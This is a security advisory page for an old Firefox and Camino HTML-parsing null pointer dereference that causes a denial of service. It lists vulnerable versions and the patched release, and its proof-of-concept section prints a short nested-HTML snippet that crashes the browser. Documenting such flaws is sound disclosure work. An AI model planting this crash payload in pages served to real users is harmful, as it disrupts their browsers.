Mozilla Firefox HTML Parsing Null Pointer Dereference Denial of Service Vulnerability

BID:17499

Info

Mozilla Firefox HTML Parsing Null Pointer Dereference Denial of Service Vulnerability

Bugtraq ID: 17499
Class: Failure to Handle Exceptional Conditions
CVE:
Remote: Yes
Local: No
Published: Apr 13 2006 12:00AM
Updated: Feb 20 2007 08:36PM
Credit: Discovered by Thomas Waldegger <[email protected]>
Vulnerable: Mozilla Firefox 1.5
Mozilla Firefox 1.0.7
Mozilla Firefox 1.0.6
Mozilla Firefox 1.0.5
Mozilla Firefox 1.0.5
Mozilla Firefox 1.0.4
Mozilla Firefox 1.0.3
+ Gentoo Linux
Mozilla Firefox 1.0.2
+ Mandriva Linux Mandrake 10.2 x86_64
 + Mandriva Linux Mandrake 10.2
+ Mandriva Linux Mandrake 10.2
+ Redhat Desktop 4.0
+ Redhat Desktop 4.0
+ Redhat Enterprise Linux AS 4
 + Redhat Enterprise Linux AS 4
 + Redhat Enterprise Linux ES 4
 + Redhat Enterprise Linux ES 4
 + Redhat Enterprise Linux WS 4
 + Redhat Enterprise Linux WS 4
 Mozilla Firefox 1.0.1
+ Redhat Fedora Core3
 Mozilla Firefox 1.0
+ Gentoo Linux
+ Gentoo Linux
+ S.u.S.E. Linux Personal 9.2 x86_64
 + S.u.S.E. Linux Personal 9.2 x86_64
 + S.u.S.E. Linux Personal 9.2
+ S.u.S.E. Linux Personal 9.2
+ S.u.S.E. Linux Personal 9.1 x86_64
 + S.u.S.E. Linux Personal 9.1 x86_64
 + S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0 x86_64
 + S.u.S.E. Linux Personal 9.0 x86_64
 + S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 9.0
+ Slackware Linux 10.1
+ Slackware Linux 10.0
+ Slackware Linux 10.0
+ Slackware Linux 9.1
+ Slackware Linux 9.1
+ Slackware Linux -current
 + Slackware Linux -current
 Mozilla Firefox 1.5.0.1
Mozilla Camino 0.8.4
Mozilla Camino 0.8.3
Mozilla Camino 0.8
Mozilla Camino 0.7 .0
Mozilla Camino 1.0
Not Vulnerable: Mozilla Firefox 1.5.0.2

Discussion

Mozilla Firefox HTML Parsing Null Pointer Dereference Denial of Service Vulnerability

Mozilla Firefox is prone to a denial-of-service condition when parsing certain malformed HTML content. Successful exploitation will cause the browser to fail or hang.

Mozilla Firefox versions 1.5.0.1 and prior are prone to this issue.

Exploit / POC

Mozilla Firefox HTML Parsing Null Pointer Dereference Denial of Service Vulnerability


The following HTML code is sufficient to trigger this issue:

<legend>
<kbd>
<object>
<h4>
</object>
</kbd>

Solution / Fix

Mozilla Firefox HTML Parsing Null Pointer Dereference Denial of Service Vulnerability

Solution:
Mozilla has released Firefox version 1.5.0.2 to address this issue.

Please see the reference section for further details.


Mozilla Firefox 1.5.0.1

Mozilla Firefox 1.0

Mozilla Firefox 1.0.1

Mozilla Firefox 1.0.2

Mozilla Firefox 1.0.3

Mozilla Firefox 1.0.4

Mozilla Firefox 1.0.5

Mozilla Firefox 1.0.5

Mozilla Firefox 1.0.6

Mozilla Firefox 1.0.7

Mozilla Firefox 1.5

References

© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report